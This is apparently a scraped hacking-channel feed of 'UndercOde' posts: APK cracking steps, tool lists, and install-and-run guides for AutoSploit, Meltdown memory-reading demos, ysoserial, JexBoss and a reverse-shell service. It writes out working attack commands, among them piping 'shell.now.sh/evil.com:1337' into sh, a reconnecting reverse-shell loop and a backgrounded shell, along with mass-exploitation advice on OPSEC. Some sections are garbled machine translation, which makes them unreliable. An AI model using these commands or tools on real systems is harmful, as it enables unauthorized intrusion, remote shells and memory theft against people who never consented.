▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Crack any android apk process by UndercOde 2 main methodes >
Briefly describe the generation process of Android apk:
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) java source code

2) java apk Compile

3) class file

4) dxTool conversion and packaging compression

5) Add third-party, other library files

6) dex file

7) apkbuilder packaging

8) Plus other resource files resources.arsc, other libraries, etc.
(Unsigned) apk file

9) jarsigner to sign + zipalign to process
(Signed) apk file

10) Can be used to publish and list various Android application markets

11) Download and install trial for ordinary users
@UndercOdeTesting
🦑 I want to crack the Android apk, which is the reverse operation:

1) Reverse (hook to dump) the dex file from the apk (the app during the runtime)

2) If it is ordinary reinforcement

3) You can successfully export dex with tools such as FDex2

4) If it is an advanced reinforcement solution

5) It is more difficult to estimate

6) Decompile the jar package from the dex file (there are various classes inside)

7) Some dex decompilation will cause various errors

8) It is estimated that the reinforcement scheme is more advanced.

9) Some dex decompiles without error

10) If it is the code that we want to include the app business logic

11) Then the Java source code of the program can be perfectly cracked afterwards

12) Decompile the java source code from the jar package

13) You can view and export all java source code
note:

> Currently if the code was previously obfuscated

14) Finally here is the obfuscated code

🦑 It's not easy to see the business logic of the original code
Description

1) This process corresponds to the previous compilation, so the strict name is called:

> Decompile = decompile

2) The corresponding tool is called: decompiler
Decompiler = decoder = decompiler

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Shells
best base base shell used by Hackers
>twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) bash - GNU Project's shell (Bourne Again SHell)
> https://www.gnu.org/software/bash/

2) elvish - Friendly, expressive shell features like anonymous functions and data structures
> https://elv.sh/

3) fish - Smart and user-friendly command line shell
> https://fishshell.com/

4) ksh93 - Korn Shell
>https://github.com/att/ast

5) mksh - MirBSD Korn Shell
>

6) nushell - A modern shell written in Rust

7) oksh - Portable OpenBSD ksh

8) osh - Bash compatible, with new/modern Unix shell language called Oil

9) pdksh - Public domain Korn shell

10) shell++ - Friendly and modern functional and object oriented shell script language

11) shenv - Simple shell version management

12) tcsh - C shell with file name completion and command line editing

13) xiki - Makes the shell console more friendly and powerful

14) xonsh - Python-ish, BASHwards-looking shell language and command prompt

15) yash - A POSIX-compliant command line shell with built-in support for completion and prediction based on command history

16) zsh - Powerful shell with scripting language
>https://github.com/nushell/nushell

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Custom prompts, color themes, Best tools for Linux Os-Free-opensources @Github repo
pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) base16-builder - Base16-Builder

2) bash-full-of-colors - Powerful prompt with screen, tmux, git support and many more

3) bash-git-prompt - An informative and fancy Bash prompt for Git users

4) bash-powerline - Powerline-style Bash prompt in pure Bash script

5) bashstrap - A quick way to spruce up OSX terminal

6) bullet-train-oh-my-zsh-theme - An oh-my-zsh shell theme based on the Powerline Vim plugin

6) emojify Emoji on the command line

7) flatui-terminal-theme - Nicer colors for terminal

8) geometry - A minimal ZSH theme where any function can be added to the left prompt or (async) right prompt on the fly.

9) git-prompt - Bash prompt with Git, SVN and HG modules

10) gittify - A colorful Bash prompt + customized Git aliases

11) Gogh - Color Scheme - Color Scheme for Gnome Terminal

12) liquidprompt - A full-featured & carefully designed adaptive prompt for Bash & Zsh

13) mysql-colorize - Colorization for mysql comand-line client

14) oh-my-git - An opinionated git prompt for bash and zsh

15) polyglot - An informative Git prompt that works in bash, zsh, ksh, mksh, pdksh, dash, and busybox sh

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Tools needed for secure penetration-Any Linux OS 2020
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Tools required for penetration :

splint unhide scrub
pscan examiner ht
flawfinder srm driftnet
rats nwipe binwalk
ddrescue firstaidkit-gui scalpel
gparted xmount pdfcrack
testdisk dc3dd wipe
foremost afftools safecopy
sectool-gui scanmem hfsutils
unhide sleuthkit cmospwd
examiner macchanger secuirty-menus
srm ngrep nc6
nwipe ntfs-3g mc
firstaidkit-gui ntfsprogs screen
net-snmp pcapdiff openvas-scanner
hexedit netsed rkhunter
irssi dnstop labrea
powertop sslstrip nebula
mutt bonesi tripwire
nano proxychains prelude-lml
vim-enhanced prewikka iftop
wget prelude-manager scamper
yum-utils picviz-gui iptraf-ng
mcabber telnet iperf
firstaidkit-plugin-all onenssh nethogs
vnstat dnstracer uperf
aircrack-ng chkrootkit nload
airsnort aide ntop
kismet pads trafshow
weplab cowpatty wavemon

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2019 later update-topic exploite script :
pinterest.com/UndercodeOfficial

🦑Features :

1) As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts.

2) Targets can be collected automatically through Shodan, Censys or Zoomeye.

> But options to add your custom targets and host lists have been included as well.

3) The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started

4) Operational Security Consideration:
Receiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.

5) The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ

> Docker Compose
Using Docker Compose is by far the easiest way to get AutoSploit up and running without too much of a hassle.

1) git clone https://github.com/NullArray/AutoSploit.git

2) cd Autosploit/Docker

3) docker-compose run --rm autosploit
Docker

🦑 Just using Docker.

1) git clone https://github.com/NullArray/AutoSploit.git

2) cd Autosploit/Docker
# If you wish to edit default postgres service details, edit database.yml. Should work out of the box
# nano database.yml

> docker network create -d bridge haknet

> docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres

> docker build -t autosploit .

> docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit

🦑Any Linux

1) git clone https://github.com/NullArray/AutoSploit

2) cd AutoSploit

3) chmod +x install.sh

4) ./install.sh

🦑 MacOs

> AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. In order to accomplish this employ/perform the below operations via the terminal or in the form of a shell script.

1) > sudo -s << '_EOF'

2) pip2 install virtualenv --user

3) git clone https://github.com/NullArray/AutoSploit.git

4) virtualenv <PATH-TO-YOUR-ENV>

5) source <PATH-TO-YOUR-ENV>/bin/activate

6) cd <PATH-TO-AUTOSPLOIT>

7) pip2 install -r requirements.txt

8) chmod +x install.sh

9) ./install.sh

10) python autosploit.py
_EOF

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

# SUPPORT & SHARE

T.me/UndercOdeTesting

🦑 all http injectors tricks in africa > patched > lastest report

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Meltdown lastest bug :
The applications in this repository are built with libkdump, a library we developed for the paper. This library simplifies exploitation of the bug by automatically adapting to certain properties of the environment.
twitter.com/UndercOdeTC

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ

on ubuntu

1) sudo yum install -y glibc-static

2) git clone https://github.com/IAIK/meltdown

3) make

4) taskset 0x1 ./test

5) + demo vid - inside same git link

🦑Starting with Linux kernel 4.12, KASLR (Kernel Address Space Layout Randomizaton) is active by default. This means, that the location of the kernel (and also the direct physical map which maps the entire physical memory) changes with each reboot.

1) This demo uses Meltdown to leak the (secret) randomization of the direct physical map. This demo requires root privileges to speed up the process. The paper describes a variant which does not require root privileges.

> Build and Run

> make

>sudo taskset 0x1 ./kaslr

2) After a few seconds, you should see something similar to this

[+] Direct physical map offset: 0xffff880000000000

🦑Reliability test (reliability)
TNow tests how reliable physical memory can be read. For this demo, you either need the direct physical map offset or you have to disable KASLR by specifying nokaslr in your kernel command line.

> Build and Run

Build and start reliability. If you have KASLR enabled, the first parameter is the offset of the direct physical map. Otherwise, the program does not require a parameter.

> make

> sudo taskset 0x1 ./reliability 0xffff880000000000

> After a few seconds, you should get an output similar to this:

[-] Success rate: 99.93% (read 1354 values)
Demo #4: Read physical memory (physical_reader)

🦑 Now reads memory from a different process by directly reading physical memory> ) or you have to disable KASLR by specifying nokaslr in your kernel command line.

> In principal, this program can read arbitrary physical addresses. However, as the physical memory contains a lot of non-human-readable data, we provide a test tool (secret), which puts a human-readable string into memory and directly provides the physical address of this string.

1) Build and Run
For the demo, first run secret (as root) to get the physical address of a human-readable string:

2) make

3) sudo ./secret
It should output something like this:

[+] Secret: If you can read this, this is really bad
[+] Physical address of secret: 0x390fff400
[+] Exit with Ctrl+C if you are done reading the secret
While the secret program is running, start physical_reader. The first parameter is the physical address printed by secret. If you do not have KASLR disabled, the second parameter is the offset of the direct physical map.

4) taskset 0x1 ./physical_reader 0x390fff400 0xffff880000000000
After a few seconds, you should get an output similar to this:

[+] Physical address : 0x390fff400
[+] Physical offset : 0xffff880000000000
[+] Reading virtual address: 0xffff880390fff400

5) If you can read this, this is really bad

🦑 Dump the memory (memdump)
This demo dumps the content of the memory. As demo #3 and #4, it uses the direct physical map, to dump the contents of the physical memory in a hexdump-like format.

> Again, as the physical memory contains a lot of non-human-readable content, we provide a test tool to fill large amounts of the physical memory with human-readable strings.

Build and Run
For the demo, first run memory_filler to fill the memory with human-readable strings. The first argument is the amount of memory (in gigabytes) to fill.

> make

> ./memory_filler 9

> Then, run the memdump tool to dump memory contents. If you executed memory_filler before, you should see some string fragments. If you have Firefox or Chrome with multiple tabs running, you might also see parts of the websites which are open or were recently closed.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to generating payloads that exploit unsafe Java object deserialization

1) ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects.

2) The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ

1) git clone https://github.com/frohoff/ysoserial

2) cd ysoserial

3) java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Clojure @JackOfMostTrades clojure:1.8.0

./........

4) java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd

5) mvn clean package -DskipTests

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 General X Window Options > commands :
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> descriptions of the commands of the X Window System. These commands have a common set of parameters. Instead of listing these parameters in the description of each command, we will list them here.
> General X Window Options

> PARAMETER VALUE
-background
red green sippy

Setting a cyst background
-background color Setting the background color of the window
-bg color Setting the background color of the window
-display
system. server number

Using an X server with a given number (usually 0) on a given system
-fg color Setting the primary color of the window
-fn font Using the specified font
-font font Using the specified font
-foreground color
red green blue

Setting the primary color of the window
-foreground color Setting the primary color of the window
-geometry
width height + x + y

Set window size and location
-geometry widths height Setting window sizes
-geometry + x + y Setting the position of the upper left corner of the window
-height line Setting the window size vertically, in rows
-position x y Setting the position of the upper left corner of the window, in pixels
@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 updated GEF - GDB Enhanced Features for exploit devs & reversers
>GEF (pronounced ʤɛf - "Jeff") is a set of commands for x86/64, ARM, MIPS, PowerPC and SPARC to assist exploit developers and reverse-engineers when using old school GDB. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis and exploit development. Application developers will also benefit from it, as GEF lifts a great part of regular GDB obscurity, avoiding repeating traditional commands, or bringing out the relevant information from the debugging runtime.
> t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

# via the install script
1) wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh

# manually
2) wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py

3) echo source ~/.gdbinit-gef.py >> ~/.gdbinit
Then just start playing:

4) gdb -q /path/to/my/bin
gef➤ gef help

🦑Features :

A few of GEF features include:

> One single GDB script.

> Entirely OS Agnostic, NO dependencies: GEF is battery-included and is installable in 2 seconds (unlike PwnDBG).

> Fast limiting the number of dependencies and optimizing code to make the commands as fast as possible (unlike PwnDBG).

>Provides a great variety of commands to drastically change your experience in GDB.

>Easily extendable to create other commands by providing more comprehensible layout to GDB Python API.

>Works consistently on both Python2 and Python3.

>Built around an architecture abstraction layer, so all commands work in a ny GDB-supported architecture such as x86-32/64, ARMv5/6/7,
> AARCH64, SPARC, MIPS, PowerPC, etc. (unlike PEDA)

> Suited for real-life apps debugging, exploit development, just as much as CTF (unlike PEDA or PwnDBG

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Windows Exploit Suggeste
> list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported
> twitter.com/UndercodeTC

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) On your linux

> git clone https://github.com/bitsadmin/wesng#windows-exploit-suggester---next-generation-wes-ng

2) go dir

> Obtain the latest database of vulnerabilities by executing the command wes.py --update.

3) Use Windows' built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txt

4) Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities are currently exposed, including exploits if available.

5) As the data provided by Microsoft's MSRC feed is frequently incomplete and false positives are reported by wes.py,

6) Additionally, make sure to check the Eliminating false positives page at the Wiki on how to interpret the results. For an overview of all available parameters, check CMDLINE.md.

# top 2020

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑UPDATED Advanced vulnerability scanning with Nmap NSE
> Vulscan is a module which enhances nmap to a vulnerability scanner. The nmap option -sV enables version detection per service which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of VulDB.
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) install the files into the following folder of your Nmap installation:

Nmap\scripts\vulscan\*

2) Clone the GitHub repository like this:

git clone https://github.com/scipag/vulscan scipag_vulscan

3) ln -s pwd/scipag_vulscan /usr/share/nmap/scripts/vulscan

4) nmap -sV --script=vulscan/vulscan.nse www.example.com

🦑Single Database Mode
You may execute vulscan with the following argument to use a single database:

--script-args vulscandb=your_own_database
It is also possible to create and reference your own databases. This requires to create a database file, which has the following structure:

<id>;<title>
> Just execute vulscan like you would by refering to one of the pre-delivered databases. Feel free to share your own database and vulnerability connection with me, to add it to the official repository.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Java Deserialization Vulnerabilities) verify and EXploitation Tool
> topic tools :
JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications..
twitter.com/UndercOdeTC

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

A) Installation on Linux\Mac
To install the latest version of JexBoss, please use the following commands:

1) git clone https://github.com/joaomatosf/jexboss.git

2) cd jexboss

3) pip install -r requires.txt

4) python jexboss.py -h

5) python jexboss.py -host http://target_host:8080

OR:

6) Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip

7) unzip master.zip

8) cd jexboss-master

9) pip install -r requires.txt

10) python jexboss.py -h

11) python jexboss.py -host http://target_host:8080

> If you are using CentOS with Python 2.6, please install Python2.7.

B) Installation example of the Python 2.7 on CentOS using Collections Software scl:

1) yum -y install centos-release-scl

2) yum -y install python27

3) scl enable python27 bash

🦑Installation on Windows
If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:

1) Download and install Python

2) Download and install Git for Windows
After installing, run the Git for Windows and type the following commands:
PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
3) > git clone https://github.com/joaomatosf/jexboss.git

4) cd jexboss

5) pip install -r requires.txt

6) python jexboss.py -h

7) python jexboss.py -host http://target_host:8080


🦑 The exploitation vectors are:

/admin-console
tested and working in JBoss versions 5 and 6

/jmx-console
tested and working in JBoss versions 4, 5 and 6

/web-console/Invoker
tested and working in JBoss versions 4, 5 and 6

/invoker/JMXInvokerServlet
tested and working in JBoss versions 4, 5 and 6

Application Deserialization
tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters

Servlet Deserialization
tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)

Apache Struts2 CVE-2017-5638
tested in Apache Struts 2 applications

🦑Tested By UndercOde On

> Debian

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Reverse Shell as a Service topic updated
>pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> clone https://github.com/lukechilds/reverse-shell
1) Listen for connection
On your machine, open up a port and listen on it. You can do this easily with netcat.

> nc -l 1337

2) Execute reverse shell on target
On the target machine, pipe the output of https://shell.now.sh/yourip:port into sh.

3) curl https://shell.now.sh/192.168.0.69:1337 | sh

4) Go back to your machine, you should now have a shell prompt.

🦑Hostname

> You can use a hostname instead of an IP.

1) curl https://shell.now.sh/localhost:1337 | sh
Remote connections
Because this is a reverse connection it can punch through firewalls and connect to the internet.

2) You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with.

> curl https://shell.now.sh/evil.com:1337 | sh

3) Reconnecting
By default when the shell exits you lose your connection. You may do this by accident with an invalid command. You can easily create a shell that will attempt to reconnect by wrapping it in a while loop.

while true; do curl https://shell.now.sh/yourip:1337 | sh; done

4) Running as a background process

> Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.

sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Microsoft finds Google Chrome vulnerability, Google finds Microsoft Edge vulnerability full by underc0de :
>Security is now a powerful difference in picking the right browser. We all use browsers for everyday activities, such as staying in touch with loved ones, editing sensitive private and corporate documents, and even managing our financial assets. A single compromise through a web browser can have disastrous consequences. This does not mean that the browser is also becoming one of the most sophisticated consumer software available, increasing the potential attack surface.
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Find and exploit remote vulnerabilities

> Usually, we do this by discovering memory corruption errors, such as buffer overflows or post-exempt vulnerabilities.

2) As with any web browser, the attack surface is extensive, including the V8 JavaScript interpreter, the Blink DOM engine, and the ium PDF PDF renderer. For this project, we focused on V8 .

3) The bugs we ultimately used for our exploit were discovered through obfuscation. We use the Azure-based fuzzy infrastructure of the Windows Security Assurance team to run ExprGen , an internal JavaScript fuzzer written by the team behind Chakra (our own JavaScript engine). People may have thrown all public fuzzers on V8 ; on the other hand, ExprGen has only operated on Chakra , giving it more opportunities to lead to new bugs.

🦑 1) Recognition error
One disadvantage of obfuscation compared to manual code review is that it is not always immediately clear what causes a given test case to trigger a vulnerability, or unexpected behavior even constitutes a vulnerability.

2) This is especially true for us at OSR; we don't have any experience working with V8 , so little is known about its internal work. In this case, the test cases generated by ExprGen reliably crashed V8 , but not always in the same way, and not in a way that could be easily affected by attackers.

3) Since fuzzers often generate very large and complex code (in this case, nearly 1,500 lines of unreadable JavaScript), the first step is usually to minimize test cases – trimming fat until we leave a small, understandable Code. This is underc0de final conclusion:

>looks weird and doesn't really implement anything, but it is valid JavaScript. All it does is create a weird structured object and then set some of its fields. This should not trigger any strange behavior, but it is. When running this code with D8 , the standalone executable version of V8 is built with git tag 6.1.5534.32 and we will experience a crash

> Looking at the address where the crash occurred ( 0x000002d168004f14 ), we can tell it will not happen in a static module. Therefore, it must be code that is dynamically generated by the V8 Just-In-Time (JIT) compiler. We also see the crash because the rax register is zero.

> looks like a classic zero dereference error, which would be a waiver: usually not exploitable because modern operating systems prevent zero virtual addresses from being mapped

+ Check out picture

> our crash happened before a function call and looked like a JavaScript function dispatcher stub, mainly because the address of v8 :: internal :: Builtin_FunctionPrototypeToString was loaded into a register before the call. Looking at the code located at the function 0x000002d167e84500 , we find that the address 0x000002d167e8455f does contain a call to the RBX instruction, which seems to confirm our suspicion.

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁